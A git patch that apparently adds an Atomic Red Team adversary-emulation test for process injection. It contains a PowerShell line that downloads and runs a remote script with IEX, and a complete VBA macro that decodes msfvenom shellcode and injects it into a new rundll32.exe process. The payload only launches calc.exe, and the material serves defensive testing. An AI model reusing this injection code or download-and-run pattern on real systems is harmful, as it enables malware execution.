From 9e352ddc2d86c859dce7aeb9987bef56134419bc Mon Sep 17 00:00:00 2001
From: Ama Smuggle Avocados
 <47680420+amasmuggleavocados@users.noreply.github.com>
Date: Fri, 11 Dec 2020 09:55:17 -0500
Subject: [PATCH] Shellcodevba (#1326)

* initial push for T1055 (Shellcode execution via VBA)

* updates

* updates

* updates

Co-authored-by: avocado <avocados@smuggler.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1055/T1055.yaml                  |  28 ++++
 atomics/T1055/src/x64/T1055-macrocode.txt | 149 ++++++++++++++++++++++
 2 files changed, 177 insertions(+)
 create mode 100644 atomics/T1055/src/x64/T1055-macrocode.txt

diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml
index f686ab64..b97c2f1d 100644
--- a/atomics/T1055/T1055.yaml
+++ b/atomics/T1055/T1055.yaml
@@ -34,3 +34,31 @@ atomic_tests:
       mavinject $mypid /INJECTRUNNING #{dll_payload}
     name: powershell
     elevation_required: true
+- name: Shellcode execution via VBA
+  auto_generated_guid: 
+  description: |
+    This module injects shellcode into a newly created process and executes. By default the shellcode is created,
+    with Metasploit, for use on x86-64 Windows 10 machines.
+
+    Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office
+    is required.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      The 64-bit version of Microsoft Office must be installed
+    prereq_command: |
+      try {
+        $wdApp = New-Object -COMObject "Word.Application"
+        $path = $wdApp.Path
+        Stop-Process -Name "winword"
+        if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
+      } catch { exit 1 }
+    get_prereq_command: |
+      Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
+  executor:
+    command: |
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+      Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
+    name: powershell
\ No newline at end of file
diff --git a/atomics/T1055/src/x64/T1055-macrocode.txt b/atomics/T1055/src/x64/T1055-macrocode.txt
new file mode 100644
index 00000000..1c7a0104
--- /dev/null
+++ b/atomics/T1055/src/x64/T1055-macrocode.txt
@@ -0,0 +1,149 @@
+Private Type PROCESS_INFORMATION
+    hProcess As Long
+    hThread As Long
+    dwProcessId As Long
+    dwThreadId As Long
+End Type
+
+Private Type STARTUPINFO
+    cb As Long
+    lpReserved As String
+    lpDesktop As String
+    lpTitle As String
+    dwX As Long
+    dwY As Long
+    dwXSize As Long
+    dwYSize As Long
+    dwXCountChars As Long
+    dwYCountChars As Long
+    dwFillAttribute As Long
+    dwFlags As Long
+    wShowWindow As Integer
+    cbReserved2 As Integer
+    lpReserved2 As Long
+    hStdInput As Long
+    hStdOutput As Long
+    hStdError As Long
+End Type
+
+Private Declare PtrSafe Function createRemoteThread Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, _
+    ByVal lpThreadAttributes As Long, _
+    ByVal dwStackSize As Long, _
+    ByVal lpStartAddress As LongPtr, _
+    lpParameter As Long, _
+    ByVal dwCreationFlags As Long, _
+    lpThreadID As Long) As LongPtr
+
+Private Declare PtrSafe Function virtualAllocEx Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, _
+    ByVal lpAddr As Long, _
+    ByVal lSize As Long, _
+    ByVal flAllocationType As Long, _
+    ByVal flProtect As Long) As LongPtr
+
+Private Declare PtrSafe Function writeProcessMemory Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, _
+    ByVal lDest As LongPtr, _
+    ByRef Source As Any, _
+    ByVal Length As Long, _
+    ByVal LengthWrote As LongPtr) As Boolean
+
+Private Declare PtrSafe Function createProcessA Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, _
+    ByVal lpCommandLine As String, _
+    lpProcessAttributes As Any, _
+    lpThreadAttributes As Any, _
+    ByVal bInheritHandles As Long, _
+    ByVal dwCreationFlags As Long, _
+    lpEnvironment As Any, _
+    ByVal lpCurrentDirectory As String, _
+    lpStartupInfo As STARTUPINFO, _
+    lpProcessInformation As PROCESS_INFORMATION) As Boolean
+
+Private Declare PtrSafe Function getProcessHandle Lib "kernel32" Alias "GetCurrentProcess" () As LongLong
+
+Private Sub Execute()
+
+Const MEM_COMMIT = &H1000
+Const PAGE_EXECUTE_READWRITE = &H40
+
+Dim sc As String
+Dim scLen As Long
+Dim byteArray() As Byte
+Dim memoryAddress As LongLong
+Dim pHandle As LongLong
+Dim sNull As String
+Dim sInfo As STARTUPINFO
+Dim pInfo As PROCESS_INFORMATION
+
+' ./msfvenom --arch x64 --platform windows -p windows/x64/exec CMD=calc.exe -f c
+sc = "fc4883e4f0e8c00000004151415052"
+sc = sc & "51564831d265488b5260488b521848"
+sc = sc & "8b5220488b7250480fb74a4a4d31c9"
+sc = sc & "4831c0ac3c617c022c2041c1c90d41"
+sc = sc & "01c1e2ed524151488b52208b423c48"
+sc = sc & "01d08b80880000004885c074674801"
+sc = sc & "d0508b4818448b40204901d0e35648"
+sc = sc & "ffc9418b34884801d64d31c94831c0"
+sc = sc & "ac41c1c90d4101c138e075f14c034c"
+sc = sc & "24084539d175d858448b40244901d0"
+sc = sc & "66418b0c48448b401c4901d0418b04"
+sc = sc & "884801d0415841585e595a41584159"
+sc = sc & "415a4883ec204152ffe05841595a48"
+sc = sc & "8b12e957ffffff5d48ba0100000000"
+sc = sc & "000000488d8d0101000041ba318b6f"
+sc = sc & "87ffd5bbf0b5a25641baa695bd9dff"
+sc = sc & "d54883c4283c067c0a80fbe07505bb"
+sc = sc & "4713726f6a00594189daffd563616c"
+sc = sc & "632e65786500"
+
+scLen = Len(sc) / 2
+ReDim byteArray(0 To scLen)
+
+For i = 0 To scLen - 1
+    If i = 0 Then
+        pos = i + 1
+    Else
+        pos = i * 2 + 1
+    End If
+    Value = Mid(sc, pos, 2)
+    byteArray(i) = Val("&H" & Value)
+Next
+
+res = createProcessA(sNull, _
+    "C:\Windows\System32\rundll32.exe", _
+    ByVal 0&, _
+    ByVal 0&, _
+    ByVal 1&, _
+    ByVal 4&, _
+    ByVal 0&, _
+    sNull, _
+    sInfo, _
+    pInfo)
+Debug.Print "[+] CreateProcessA() returned: " & res
+
+newAllocBuffer = virtualAllocEx(pInfo.hProcess, _
+    0, _
+    UBound(byteArray), _
+    MEM_COMMIT, _
+    PAGE_EXECUTE_READWRITE)
+Debug.Print "[+] VirtualAllocEx() returned: 0x" & Hex(newAllocBuffer)
+
+Debug.Print "[*] Writing memory..."
+For Offset = 0 To UBound(byteArray)
+    myByte = byteArray(Offset)
+    res = writeProcessMemory(pInfo.hProcess, _
+        newAllocBuffer + Offset, _
+        byteArray(Offset), _
+        1, _
+        ByVal 0&)
+Next Offset
+Debug.Print "[+] WriteProcessMemory() returned: " & res
+
+Debug.Print "[+] Executing shellcode now..."
+res = createRemoteThread(pInfo.hProcess, _
+    0, _
+    0, _
+    newAllocBuffer, _
+    0, _
+    0, _
+    0)
+
+End Sub
\ No newline at end of file